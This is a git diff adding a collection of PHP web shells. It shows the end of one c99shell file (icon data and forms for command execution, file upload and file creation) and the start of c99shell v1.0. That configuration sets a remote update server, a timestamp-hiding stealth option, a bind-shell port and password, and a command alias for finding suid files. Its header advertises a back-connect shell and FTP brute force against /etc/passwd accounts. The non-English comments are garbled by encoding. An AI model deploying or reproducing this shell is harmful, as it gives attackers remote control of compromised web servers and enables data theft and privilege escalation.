+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_nfo"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_ocx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ".
+"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==",
+"ext_pcx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pif"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW".
+"mJRRiRQ2Z5+odNqxWK/YrDUCADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_png"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_reg"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM".
+"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7".
+"GZPK43E0DI1oC4J4TO4qtOhSAgA7",
+"ext_rev"=>
+"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC".
+"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6".
+"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99".
+"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw".
+"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e".
+"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6".
+"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",
+"ext_rmi"=>
+"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".
+"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".
+"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",
+"ext_rtf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_shtm"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_shtml"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_so"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_stl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_sys"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+   if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+   echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $d�ta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+</td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($aliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td></tr>
+</TABLE>
+<br>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=search"><b>Search</b></a> ::</b><form method="POST"><input type="hidden" name="act" value="search"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type="submit" name="submit" value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><p align="center"><b>:: <a href="<? echo $surl; ?>act=upload&d=<? echo $ud; ?>"><b>Upload</b></a> ::</b><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="act" value="upload"><input type="file" name="uploadfile"><input type="hidden" name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"></font><center><? echo $wdt; ?></center></form></p></td>
+</tr>
+</table><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><p align="center"><b>:: Make Dir ::</b></p><p align="center"><form method="POST"><input type="hidden" name="act" value="mkdir"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><center><? echo $wdt; ?></center></form></p></td><td width="50%" height="1" valign="top"><p align="center"><b>:: Make File ::</b></p><center><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><center><? echo $wdt; ?></form></center></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> &copy; powered <a href="<?php echo $surl; ?>act=about"><u><b>by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo $microtime; ?> ]--</b></p></td></tr></table></body></html><?php chdir($lastdir); ?>
+
+
diff --git a/xakep-shells/PHP/c99shell_v1.0.php.php.txt b/xakep-shells/PHP/c99shell_v1.0.php.php.txt
new file mode 100644
index 0000000..ca7c4d6
--- /dev/null
+++ b/xakep-shells/PHP/c99shell_v1.0.php.php.txt
@@ -0,0 +1,2900 @@
+<?php
+/*
+******************************************************************************************************
+*
+*                    c99shell.php v.1.0 (�� 5.02.2005)
+*		   Freeware WEB-Shell.
+*		      � CCTeaM.
+*  c99shell.php - ���� ����� www-�������.
+*  �� ������ ������� ��������� ������ �� �������� ��������� ��������: http://ccteam.ru/releases/c99shell
+*
+*  WEB: http://ccteam.ru
+*  UIN: 656555
+* 
+*  �����������:
+*  ~ ���������� �������/�������, ����������� � ���������� ������ � ������ (�������������� ��������� � tar)
+*    modify-time � access-time � ������ �� �������� ���
+     �������������� ������ (����./���. ���������� $filestealth)
+*  ~ ����������� ����� �� ������/������ (���� ����� ������ ������)
+*  ~ ���������� ���������� unix-������, ����������� �������� ������� ����������,
+     � ����� ��������� "����������" ��������.
+*  ~ ������� (������ �����������) ���������� ����-������ (����� �������, ����� ����� ���������/������� ��)
+*  ~ ���������� ������������� PHP-����
+*  ~ ����������� �������� ����-�������� �������
+*  ~ ������� ftp-������������ �� ������ login;login ��
+     /etc/passwd (������ ���� ������ � 1/100 ���������)
+*  ~ ����������� �������� SQL
+*  ~ ������ "�����" include, ��� ���������� ������, ��� ����� ������� $surl.
+*  ~ ����������� ��������� /bin/bash �� ������������ ���� � ������������ �������,
+     ��� ������� back connect (������������ ������������ ����������,
+    � ��������� ��������� ��� ������� NetCat).
+*
+*
+*  5.02.2005 � Captain Crunch Security TeaM
+*
+*  Coded by tristram
+******************************************************************************************************
+*/
+$shver = "1.0 beta (5.02.2005)"; //Current version
+//CONFIGURATION
+$surl = "?"; //link to this script, INCLUDE "?".
+$rootdir = "./"; //e.g "c:", "/","/home"
+$timelimit = 60; //limit of execution this script (seconds).
+
+//Authentication
+
+$login = ""; //login
+//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+$login = false; //turn off authentication
+
+$autoupdate = true; //Automatic updating?
+
+$updatenow = false; //If true, update now
+
+$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
+
+$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
+
+$filestealth = 1; //if true, don't change modify&access-time
+
+$donated_html = ""; //If you publish free shell and you wish
+					//add link to your site or any other information,
+					//put here your html.
+$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
+
+$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
+
+$curdir = "./"; //start directory
+
+$tmpdir = dirname(__FILE__); //Directory for tempory files
+  
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 9999; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	// default password for binding
+$bindport_port = "11457";	// default port for binding
+
+/* Command-aliases system */
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+/* ����� �� ������� ���� ������ � suid ����� */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+/* ����� � ������� ���������� ���� ������ � suid ����� */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
